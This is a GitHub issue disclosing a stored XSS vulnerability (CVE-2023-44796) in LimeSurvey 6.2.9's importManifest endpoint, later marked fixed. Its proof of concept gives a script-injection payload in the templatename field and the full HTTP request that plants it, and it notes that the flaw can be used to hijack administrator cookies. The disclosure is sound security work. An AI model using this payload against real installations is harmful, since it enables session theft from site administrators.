Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey #4

Open
Hebing123 opened this issue Dec 14, 2023 · 1 comment
Open

LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey #4

Hebing123 opened this issue Dec 14, 2023 · 1 comment

Comments

@Hebing123
Copy link
Owner

Hebing123 commented Dec 14, 2023
edited

LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey

Description

A regular user with "theme" privileges who maliciously sets the "templatename" during the importManifest process can lead to a stored Cross-Site Scripting (XSS) vulnerability.

Proof of Concept

The first step is to create a user with only 'theme' permission.
Log in to this user and make a request to/index.php/themeOptions/importManifest.
Payload:
"><script>alert(1)</script>//

Request:

POST /index.php/themeOptions/importManifest HTTP/1.1
Host: 192.168.160.130
Content-Length: 362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.160.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.160.130/index.php/themeOptions/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: []
Connection: close

------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
Content-Disposition: form-data; name="YII_CSRF_TOKEN"

cEVmTmlNRXlqNVFBSl9qYnVGUmtjd2VZUHJtQ0F1UG5pEjQOU-SeXW7To0RH9_rPINh_thglgRaA23WdYDqjUA==
------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
Content-Disposition: form-data; name="templatename"

123"><script>alert(1)</script>//
------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx--

When administrators or other users access http://192.168.160.130/index.php/themeOptions
When, it will be subjected to storage based XSS attacks.

Impact

Attackers can import a templatename containing a payload to execute JavaScript code and hijack the administrator’s cookie.

tiborpacalat marked this as fixed in 6.2.9+230925 with commit 135511 2 months ago
@Hebing123
Copy link
Owner Author

Hebing123 commented Jan 11, 2024
edited

This is the vulnerability exploitation reference for CVE-2023-44796.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Hebing123